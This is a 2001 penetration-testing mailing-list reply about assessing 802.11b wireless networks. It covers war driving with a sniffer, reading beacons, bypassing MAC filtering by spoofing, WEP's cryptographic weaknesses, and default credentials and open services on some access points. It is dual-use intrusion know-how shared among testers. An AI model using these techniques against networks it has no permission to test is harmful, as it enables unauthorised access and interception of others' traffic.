Re: [PEN-TEST] Penetrating Wireless Networks

[Mark Seiden <mis () SEIDEN COM>]

(be careful: it's just a matter of time before the first fatal
accident involving use of wireless sniffers while driving...
i have termed this "war driving".)

a useful tool for win2k is wildpackets "airopeek" wireless sniffer.
it has just come out of beta, and the beta version only supports
the cisco 340 family NIC, due to modified NDIS drivers.

with this running on my laptop while i drive i usually pick up
an access point per mile or two, even at > 60 mph with no special
antenna.

you can see the wireless frames including 802.11 beacons, which contain
the name of the access point, the channel and whether WEP is in use,
as well as all of the MAC addresses of talking interfaces, and a signal
strength indication so you can figure out which way to go.

if you supply the wep keys, it will decrypt.

it's a useful sniffer ... but:  it does not produce frames in tcpdump
format. you need a separate utility for that.

also, it's EXPENSIVE: $1995 plus maintenance.  aargh.  (i got the beta
for free...)  (maybe they need more competition... from something free?)

regarding general sniffing of WLAN:

choice of antenna is important, by the way, if you want to do "war
driving".  (peter shipley recently mentioned he had a gps hooked up to
a sniffer as well, so he records an location when the frames were
received ...)

you don't need the SSID.  it provides no value anyway (since you can
use the ALL value).  but you can see it in the 802.11 beacons, and
with WEP it gives a clue to the organization owning the access point
(without WEP their email and web surfing is a much better clue...).

it does not appear that MAC-based access control (which some access
points have) is entirely useful, since you can change your MAC address
on some interfaces to spoof that of some NIC you've seen successfully
talking.

802.11b WEP provides little value (regardless of key length chosen)
due to the reuse of the keystream, the lack of dynamic rekeying, and
the possibility of known plaintext attacks.  you have to record a few
gigabytes of WEP data traffic to launch this attack, though, and i
don't believe anyone has yet automated the exploit.  (this has been
known by members of the 802.11 committee for at least a year, more
like two...)

(802.11e is trying to fix this, and cisco has announced an 802.1x
implementation for the 350 card which seemingly complies with the
compromise proposal in the 802.11 committee).

as a separate issue: some of the wireless access points ship with
naive ideas about administration and maintenance.

(run nmap against an access point...)

the smc and addtron access points, which use code licensed from a
little company in ontario, neesus, have an open service (a listener
for a no longer available proprietary and undocumented administration
utility) which does nothing (they say -- we shall see), a web server
for configuration with an unchangeable user "default", and a default
password (which is changeable, at least).  there are also strings in
the access point binary image which make me wonder about back doors --
neesus says they can't explain them and maybe they're from the
development environment they use.

it's the wild west out there...

On Tue, Mar 06, 2001 at 07:23:22PM -0600, Frank Knobbe wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Greetings,
>
> I know the technologies are rather new compared to wired networks,
> but does anyone have and pointers for penetration tests of wireless
> networks, 802.11b in particular?
>
> In my opinion, with the advance of wireless networks, this will be a
> very important part of pen tests. Has anyone developed any
> methodologies for such tests? Are there any tools available that
> assist in testing wireless networks? For example, one is able to run
> tcpdump and other goodies on the wireless card just like on regular
> NIC's. However, in order to gain access to the WLAN, one must know
> not only the WEP encryption key (if WEP is used), but also the ESS
> (network identifier), preamble length, and channel number. Are there
> any tools that provide automation of changes for these values (for an
> automated scan)? Are there any tools for 'low-level' 802.11b data
> examination (i.e. preamble checking/display, etc)?
>
> Regards,
> Frank
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Personal Privacy 6.5.8
> Comment: PGP or S/MIME encrypted email preferred.
>
> iQA/AwUBOqWNiZytSsEygtEFEQJ2oQCg4/opiTBaIeIx1TeJhnJ8ZtJ8SdAAoK2M
> uEjKyVpUpTsC9ci2eJ++DA+N
> =C3F0
> -----END PGP SIGNATURE-----

--
mark seiden, mis () seiden com, 1-(650) 592 8559 (voice) Pacific Time Zone